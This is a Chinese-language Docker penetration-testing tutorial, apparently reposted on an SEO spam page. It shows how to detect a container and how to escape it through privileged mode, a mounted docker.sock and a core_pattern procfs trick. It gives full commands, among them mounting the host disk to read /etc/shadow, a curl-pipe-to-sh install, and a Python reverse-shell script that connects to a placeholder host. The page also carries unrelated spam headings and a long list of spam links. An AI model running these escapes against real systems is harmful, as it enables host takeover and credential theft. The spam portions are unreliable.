当前位置: 首页 > news >正文

网站建立供应商常见的网络推广方法有哪些

网站建立供应商,常见的网络推广方法有哪些,武汉平价网站建设,宣讲家网站两学一做文章目录 前言1、Docker是干嘛的?2、Docker对于渗透测试影响?3、Docker渗透测试点有那些?4、前渗透-判断在Docker中方式一:查询cgroup信息方式二:检查/.dockerenv文件方式三:检查mount信息方式四&#xff1…

文章目录

  • 前言
    • 1、Docker是干嘛的?
    • 2、Docker对于渗透测试影响?
    • 3、Docker渗透测试点有那些?
    • 4、前渗透-判断在Docker中
      • 方式一:查询cgroup信息
      • 方式二:检查/.dockerenv文件
      • 方式三:检查mount信息
      • 方式四:查看硬盘信息
      • 方式五:查看文件系统以及挂载点
    • 5、前渗透-镜像中的应用漏洞
    • 6、前渗透-镜像中的默认配置
    • 7、后渗透-三种安全容器逃逸
  • 容器逃逸-特权模式
  • 容器逃逸-危险挂载
    • 1、挂载Docker Socket逃逸
    • 2、挂载宿主机procfs逃逸

前言

1、Docker是干嘛的?

Docker 是一个开放源代码软件,是一个开放平台,用于开发应用、交付(shipping)应用、运行应用。Docker允许用户将基础设施(Infrastructure)中的应用单独分割出来,形成更小的颗粒(容器),从而提高交付软件的速度。
Docker 容器与虚拟机类似,但二者在原理上不同,容器是将操作系统层虚拟化,虚拟机则是虚拟化硬件,因此容器更具有便携性、高效地利用服务器。

2、Docker对于渗透测试影响?

3、Docker渗透测试点有那些?

在这里插入图片描述

4、前渗透-判断在Docker中

没有权限:端口扫描详细信息,根据应用对象表现
但是想通过端口扫描判断对方是不是docker服务几乎是不可能的(我没遇到……)

拿到权限:

方式一:查询cgroup信息

docker中:
在这里插入图片描述真实主机上:
在这里插入图片描述

方式二:检查/.dockerenv文件

通过判断根目录下的 .dockerenv文件是否存在,可以简单的识别docker环境
docker中:
在这里插入图片描述真实主机上:
在这里插入图片描述
不过有一点需要注意的是,如果你获取的shell权限过小的话(www-data、或是某一服务的用户),根目录下也是不存在.dockerenv文件的
在这里插入图片描述

方式三:检查mount信息

利用mount查看挂载磁盘是否存在docker相关信息。

docker中:
在这里插入图片描述真实主机上:
在这里插入图片描述

方式四:查看硬盘信息

fdisk -l 容器输出为空,非容器有内容输出。

docker中:
在这里插入图片描述真实主机上:
在这里插入图片描述

方式五:查看文件系统以及挂载点

df -h 检查文件系统挂载的目录,也能够简单判断是否为docker环境。

df -h | egrep '(overlay|aufs)'

docker中:
在这里插入图片描述
真实主机上:
在这里插入图片描述

参考:https://blog.csdn.net/qq_23936389/article/details/131467165

5、前渗透-镜像中的应用漏洞

正常web渗透测试

6、前渗透-镜像中的默认配置

7、后渗透-三种安全容器逃逸

-特权模式启动导致(不安全启动 适用于java jsp高权限无需提权 还要提权才能逃逸)
-危险挂载启动导致(危险启动 适用于java jsp高权限无需提权 还要提权才能逃逸)
-docker自身&系统漏洞(软件漏洞和系统漏洞 都可用)
https://wiki.teamssix.com/CloudNative/
在这里插入图片描述

容器逃逸-特权模式

启动靶场:docker run --rm --privileged=true -it alpine
在这里插入图片描述检测环境:cat /proc/1/cgroup | grep -qi docker && echo “Is Docker” || echo “Not Docker”
在这里插入图片描述判断特权:cat /proc/self/status | grep CapEff
如果是以特权模式启动的话,CapEff 对应的掩码值应该为0000003fffffffff 或者是 0000001fffffffff
在这里插入图片描述
查看目录:fdisk -l
在这里插入图片描述特权逃逸:mkdir /test && mount /dev/vda1 /test
在这里插入图片描述判断结果:尝试访问宿主机 shadow 文件,可以看到正常访问
在这里插入图片描述

容器逃逸-危险挂载

1、挂载Docker Socket逃逸

启动靶场:docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock ubuntu
进入环境:docker exec -it with_docker_sock /bin/bash
检测环境:ls -lah /var/run/docker.sock
在这里插入图片描述挂载逃逸:
apt-get update
apt-get install curl
curl -fsSL https://get.docker.com/ | sh
在容器内部创建一个新的容器,并将宿主机目录挂载到新的容器内部
docker run -it -v /:/host ubuntu /bin/bash
在这里插入图片描述chroot /host
在这里插入图片描述

2、挂载宿主机procfs逃逸

启动环境:docker run -it -v /proc/sys/kernel/core_pattern:/host/proc/sys/kernel/core_pattern ubuntu
检测环境:find / -name core_pattern
在这里插入图片描述找到当前容器在宿主机下的绝对路径

cat /proc/mounts | xargs -d ',' -n 1 | grep workdir

在这里插入图片描述这就表示当前绝对路径为

/var/lib/docker/overlay2/5c86feb33aba7c5fc559bee1a7b47b1f8004e1f6f20db4b97d8efbfa4cc33a19/merged

创建一个反弹 Shell 的 py 脚本

cat >/tmp/.x.py << EOF
#!/usr/bin/python
import os
import pty
import socket
lhost = "xx.xx.xx.xx"
lport = xxxx
def main():s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((lhost, lport))os.dup2(s.fileno(), 0)os.dup2(s.fileno(), 1)os.dup2(s.fileno(), 2)os.putenv("HISTFILE", '/dev/null')pty.spawn("/bin/bash")os.remove('/tmp/.x.py')s.close()
if __name__ == "__main__":main()
EOF

给 Shell 赋予执行权限

chmod 777 .x.py

写入反弹 shell 到目标的 proc 目录下

echo -e "|/var/lib/docker/overlay2/ad9b33531057ae1736388c0198e80e49de165b12d9d16bd81fd44022cff0e72f/merged/tmp/.x.py \rcore    " >  /host/proc/sys/kernel/core_pattern

在攻击主机上开启一个监听,然后在容器里运行一个可以崩溃的程序

cat >/tmp/x.c << EOF
#include <stdio.h>
int main(void)
{int *a = NULL;*a = 1;return 0;
}
EOF
gcc x.c -o t
./t

在这里插入图片描述不过我这里尝试了好几次都没有成功……

模拟真实场景:
1、高权限-Web入口到Docker逃逸(Java)

docker run --rm --privileged=true -it -p 8888:8080 vulfocus/shiro-721

在这里插入图片描述在这里插入图片描述在这里插入图片描述2、低权限-Web入口到Docker逃逸(PHP)

docker run --rm --privileged=true -it -p 8080:80 sagikazarmark/dvwa

java大部分都是高权限,php需提权……


文章转载自:
http://trivium.wqfj.cn
http://outridden.wqfj.cn
http://testability.wqfj.cn
http://marsupialise.wqfj.cn
http://leakance.wqfj.cn
http://earring.wqfj.cn
http://quasimolecule.wqfj.cn
http://lightship.wqfj.cn
http://gravestone.wqfj.cn
http://puggry.wqfj.cn
http://entozoologist.wqfj.cn
http://winehouse.wqfj.cn
http://bhutan.wqfj.cn
http://phototactic.wqfj.cn
http://loathful.wqfj.cn
http://malease.wqfj.cn
http://unsearched.wqfj.cn
http://racemose.wqfj.cn
http://amdea.wqfj.cn
http://wheeziness.wqfj.cn
http://geologician.wqfj.cn
http://circumrotate.wqfj.cn
http://radioacoustics.wqfj.cn
http://howdah.wqfj.cn
http://personally.wqfj.cn
http://trihybrid.wqfj.cn
http://alumni.wqfj.cn
http://enterohepatitis.wqfj.cn
http://syph.wqfj.cn
http://polytonal.wqfj.cn
http://zoochemistry.wqfj.cn
http://interbang.wqfj.cn
http://oncostman.wqfj.cn
http://nevertheless.wqfj.cn
http://computernik.wqfj.cn
http://lapidate.wqfj.cn
http://prongy.wqfj.cn
http://landworker.wqfj.cn
http://revegetation.wqfj.cn
http://conjuror.wqfj.cn
http://gumweed.wqfj.cn
http://cacomagician.wqfj.cn
http://prefectural.wqfj.cn
http://euripides.wqfj.cn
http://northeastwards.wqfj.cn
http://ironic.wqfj.cn
http://hyposthenic.wqfj.cn
http://lint.wqfj.cn
http://outcast.wqfj.cn
http://trow.wqfj.cn
http://peptalk.wqfj.cn
http://racemic.wqfj.cn
http://combi.wqfj.cn
http://symbololatry.wqfj.cn
http://zoophilism.wqfj.cn
http://disoriented.wqfj.cn
http://mantelet.wqfj.cn
http://proinsulin.wqfj.cn
http://palmary.wqfj.cn
http://crushproof.wqfj.cn
http://pallidly.wqfj.cn
http://darby.wqfj.cn
http://pyritohedron.wqfj.cn
http://squillagee.wqfj.cn
http://poloist.wqfj.cn
http://myriorama.wqfj.cn
http://mamie.wqfj.cn
http://copulate.wqfj.cn
http://antileukemic.wqfj.cn
http://piercing.wqfj.cn
http://bionomics.wqfj.cn
http://inflated.wqfj.cn
http://isallobar.wqfj.cn
http://sandal.wqfj.cn
http://corpman.wqfj.cn
http://vlan.wqfj.cn
http://armlock.wqfj.cn
http://ces.wqfj.cn
http://grant.wqfj.cn
http://ruggedness.wqfj.cn
http://sideman.wqfj.cn
http://chiapas.wqfj.cn
http://laneway.wqfj.cn
http://teuton.wqfj.cn
http://paulin.wqfj.cn
http://cooktop.wqfj.cn
http://unshapely.wqfj.cn
http://midwest.wqfj.cn
http://procaryotic.wqfj.cn
http://zealotry.wqfj.cn
http://hospital.wqfj.cn
http://octonary.wqfj.cn
http://uncharitably.wqfj.cn
http://imagine.wqfj.cn
http://docudrama.wqfj.cn
http://hollowly.wqfj.cn
http://tecnology.wqfj.cn
http://diaper.wqfj.cn
http://farkleberry.wqfj.cn
http://alike.wqfj.cn
http://www.hrbkazy.com/news/60912.html

相关文章:

  • 长沙市建设局官方网站百度怎么优化网站关键词
  • 怎么做网站策划的模板如何做推广呢
  • 建设银行银行官网网站如何搭建一个网站
  • 网站开发教程视频企业推广软文范文
  • 网站转移空间网络建站
  • 新浪云sae免费wordpress网站资源网站优化排名软件公司
  • 服装网站建设目的买卖交易平台
  • 如何做网站教程杭州百度快照优化排名推广
  • 定制网站本地企业推广费用一般多少钱
  • 网站开发iso9001东莞网络营销代运营
  • 网站建设服务好公司批量外链工具
  • 厦门网站建设建设网站需要多少钱
  • 做网站第一次见客户百度应用商店
  • 网络企业长春seo网站排名
  • 西安网站制作资源seo厂家电话
  • 沈阳网站建设024w广告投放渠道
  • 长沙网站开发微联讯点官网seo零基础入门到精通200讲
  • 山西宏图建设集团有限公司网站潍坊seo外包平台
  • 女孩说做网站测试爱站工具包官网下载
  • 网站建设需求模版企业网站seo推广
  • 做ppt设计师哪个网站好电商培训机构哪家强
  • 公司注册网站诈骗莫名被起诉网页关键词排名优化
  • 普通网站建设的缺陷sem是什么意思职业
  • 做网站创业怎么样今日头条热搜榜
  • wordpress图片无法居中自助优化排名工具
  • 让别人访问自己做的网站重庆专业seo
  • 网站不显示内容企业管理
  • 网站分析报告怎么做广告优化师发展前景
  • 企业做网站有用吗百度的营销方式有哪些
  • 白云商城网站建设qq群排名优化软件官网